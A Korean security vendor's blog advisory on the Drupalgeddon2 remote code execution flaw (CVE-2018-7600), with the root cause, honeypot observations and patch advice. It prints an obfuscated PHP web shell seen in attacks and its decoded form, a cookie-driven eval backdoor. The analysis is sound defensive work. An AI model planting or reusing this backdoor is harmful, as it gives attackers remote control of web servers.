Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

취약점 정보

앞 내용 보기 다음 내용 보기
취약점 정보Drupalgeddon2 취약점 (CVE-2018-7600)
작성일 2018-04-20 조회 1027

 

개요

전 세계 수백만개의 웹사이트에 사용되는 오픈 소스 CMS인 Drupal에서 원격코드실행 취약점이 발견되었습니다. 해당 취약점은 2014년에 발견된 Drupalgeddon에 이어 Drupalgeddon2라고 명명되었습니다. 공격자는 조작된 요청을 서버에 전달함으로써 임의의 코드를 실행할 수 있습니다.

 

확인내역

 

 Drupal에서는 사용자가 Request 전달하면 doRender()함수를 통해 렌더링이 됩니다. 대부분의 경우 사용자는 doRender()함수의 elements 매개 변수를 제어할 수가 없습니다. 이번에 발견된 Drupalgeddon2은 email 주소필드를 통해 전달되는 매개변수가 사용자가 제어가 가능하게되어 취약점이 발생합니다<그림 1 참조>.

 

< 그림 1 - 사용자가 제어할 수 있는 개체값을 작성할 수 있는 부분>

참조-https://research.checkpoint.com/uncovering-drupalgeddon-2/

 

아래 <그림 2>는 자체 구축한 허니넷에 탐지 된 deupalgeddon2 패킷입니다. 공격 유형을 보면 wget, curl 등을 통해 스크립트를 다운로드 받는데 텍스트 공유사이트인 pastebin.com을 이용합니다.

 

< 그림 2 - 실제 공격 탐지 패킷>

 

 

여러 악성 스크립트중에 Weevely라는 도구를 이용한 난독화된 스크립트도 발견되었습니다.<코드 1>참조

해당 도구는 주로 쉘 스크립트등  악의적인  스크립트를 숨기기 위해 사용됩니다.

 

?php $rtpz="lKHByZWdfcmVwbGFjZShhcnJheShdgnL1teXHchd9XhdHhdNdLycsJy9ccy8nKShdwgYhdXJhdyYXkoJychdsJyhdsn"; $tsdg = str_replace("b","","bsbtbrb_rbebpblacbe"); $wxhw="KhdSwgam9pbhdihhcnJhehdV9zbhdGljZSgkYSwkYygkYSktMykpKSkpO2VjaG8ghdJzhdwvJy4kahdy4nPic7fQ=="; $feka="hdpeyRrPSdyaXNoZXJlJhdztlhdY2hhdvICc8hdJy4kayhd4nPic7ZXhdZhbChdhiYXhdNlNjRfZGVjb2R"; $asys="JGM9J2NvdWhd50JzskYT0khdX0NPT0tJRTtphdZihdhyZXNhdldhdChdgkhdYSkhd9PShddtcicgJiYhdgJGMohdJGEpPjM"; $zjzy = $tsdg("q", "", "qbaqsqeq6q4q_qdqecoqde"); $liiy = $tsdg("z","","crzezatez_fzunctzizon"); $iuwt = $liiy("", $zjzy($tsdg("hd", "", $asys.$feka.$rtpz.$wxhw))); $iuwt(); ?

<코드 1 - 난독화 된 공격 스크립트>

 

난독화 해제하면 아래 스크립트가 나타나는데 

 

$c='count';
$a=$_COOKIE;
if(reset($a)=='mr' && $c($a)>3){$k='rishere';echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^w=s]/','/s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '';}

<코드 2 - 난독화가 해제 된 스크립트>

 

공격자들이 주로 악의적으로 사용하는 공격 유형이며 해당 스크립트는 사용자에 의해 전달되는 Cookie 값을 통해 코드를 실행하게 하는 스크립트입니다.

 

이번 공격을 통해 파악된 공격자들은 Pastebin.com, 악성 그림파일, 난독화 스크립트등 다양한 방법을 통해 탐지 우회를 시도하며 백도어 및 마이너 설치를 시도하는 점차 지능적인 형태를 보이고 있습니다. 사용자들에겐 각별한 주의가 필요할 때입니다.

 

대응방안

1.해당 벤더사의 권고사항을 참조하여 최신버전으로 업데이트한다.
https://www.drupal.org/sa-core-2018-002

 

2.당사 Sniper장비에서는 아래와 같은 패턴으로 대응이 가능하다.

[4224] Drupal Core doRender RCE

 

참고

https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/
https://research.checkpoint.com/uncovering-drupalgeddon-2/
https://securityaffairs.co/wordpress/71517/hacking/drupalgeddon2-attacks.html

첨부파일 첨부파일이 없습니다.
태그 CVE-2018-7600  Drupal  drupalgeddon